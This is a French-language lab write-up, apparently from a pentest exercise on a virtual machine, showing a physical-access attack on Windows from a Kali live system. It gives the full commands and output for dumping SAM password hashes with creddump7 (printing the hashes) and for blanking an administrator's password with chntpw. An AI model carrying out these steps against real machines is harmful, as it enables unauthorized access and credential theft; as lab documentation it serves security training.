Attaque physique

Pénétration du système par voie physique

Connexion à la machine sur KaliLinux en mode live

On va depuis cette machine, voir dans quelle partition la machine Windows se situe:

┌──(kali㉿kali)-[/]
└─$ sudo fdisk -l
Disk /dev/sda: 80 GiB, 85899345920 bytes, 167772160 sectors
Disk model: VBOX HARDDISK
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x6036ac36

Device     Boot   Start       End   Sectors  Size Id Type
/dev/sda1  *       2048   1187839   1185792  579M  7 HPFS/NTFS/exFAT
/dev/sda2       1187840 167770111 166582272 79.4G  7 HPFS/NTFS/exFAT

Disk /dev/loop0: 3.34 GiB, 3588648960 bytes, 7009080 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes

On voit que c’est sda2 qui stock les informations. Après avoir monté le tout, on obtient via creddump7 les users et les mots de passe hashé:

┌──(kali㉿kali)-[/usr/share/creddump7]
└─$ python3 pwdump.py /opt/windob/Windows/System32/config/SYSTEM /opt/windob/Windows/System32/config/SAM
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:ac221aa41bb3fe71c9830cfff5e3c8e2:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:e4a0c4e1a1090919f2a22e9435fe7bce:::
user:1001:aad3b435b51404eeaad3b435b51404ee:36aa83bdcab3c9fdaf321ca42a31c3fc:::

Sinon il y a une autre solution, nous pouvons utiliser chntpw pour reset le mot de passe à NULL.

┌──(kali㉿kali)-[/etc/opt]
└─$ sudo mkdir yolo

┌──(kali㉿kali)-[/etc/opt]
└─$ sudo mount -t ntfs-3g /dev/sda2 /etc/opt

┌──(kali㉿kali)-[/etc/opt]
└─$ cd /etc/opt

┌──(kali㉿kali)-[/etc/opt]
└─$ ls
'$Recycle.Bin'  '$SysReset'  'Documents and Settings'   pagefile.sys   PerfLogs   ProgramData  'Program Files'  'Program Files (x86)'   Recovery   swapfile.sys  'System Volume Information'   Users   Windows

┌──(kali㉿kali)-[/etc/opt]
└─$ cd Windows/System32/config

┌──(kali㉿kali)-[/etc/opt/Windows/System32/config]
└─$ sudo chntpw -i SAM
chntpw version 1.00 140201, (c) Petter N Hagen
Hive <SAM> name (from header): <\\SystemRoot\\System32\\Config\\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 686c <lh>
File size 65536 [10000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 329/35936 blocks/bytes, unused: 24/21152 blocks/bytes.

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: <SAM>

  1 - Edit user data and passwords
  2 - List groups
      - - -
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)

What to do? [1] -> 1

===== chntpw Edit User Info & Passwords ====

| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrateur                 | ADMIN  | dis/lock |
| 01f7 | DefaultAccount                 |        | dis/lock |
| 01f5 | Invit�                         |        |          |
| 03e9 | user                           | ADMIN  |          |
| 01f8 | WDAGUtilityAccount             |        | dis/lock |

Please enter user number (RID) or 0 to exit: [3e9] 03e9
================= USER EDIT ====================

RID     : 1001 [03e9]
Username: user
fullname:
comment :
homedir :

00000220 = Administrateurs (which has 3 members)

Account bits: 0x0214 =
[ ] Disabled        | [ ] Homedir req.    | [X] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  |
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  |

Failed login count: 0, while max tries is: 0
Total  login count: 12

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select
Select: [q] > 1
Password cleared!
================= USER EDIT ====================

RID     : 1001 [03e9]
Username: user
fullname:
comment :
homedir :

00000220 = Administrateurs (which has 3 members)

Account bits: 0x0214 =
[ ] Disabled        | [ ] Homedir req.    | [X] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  |
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  |

Failed login count: 0, while max tries is: 0
Total  login count: 12
** No NT MD4 hash found. This user probably has a BLANK password!
** No LANMAN hash found either. Try login with no password!

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select
Select: [q] > 1
Password cleared!
================= USER EDIT ====================

RID     : 1001 [03e9]
Username: user
fullname:
comment :
homedir :

00000220 = Administrateurs (which has 3 members)

Account bits: 0x0214 =
[ ] Disabled        | [ ] Homedir req.    | [X] Passwd not req. |
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     |
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   |
[X] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  |
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  |

Failed login count: 0, while max tries is: 0
Total  login count: 12
** No NT MD4 hash found. This user probably has a BLANK password!
** No LANMAN hash found either. Try login with no password!

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select
Select: [q] > q

<>========<> chntpw Main Interactive Menu <>========<>

Loaded hives: <SAM>

  1 - Edit user data and passwords
  2 - List groups
      - - -
  9 - Registry editor, now with full write support!
  q - Quit (you will be asked if there is something to save)

What to do? [1] -> q

Hives that have changed:
 #  Name
 0  <SAM>
Write hive files? (y/n) [n] : y
 0  <SAM> - OK

Après un reboot de la machine Windows, nous obtenons les accès.

Untitled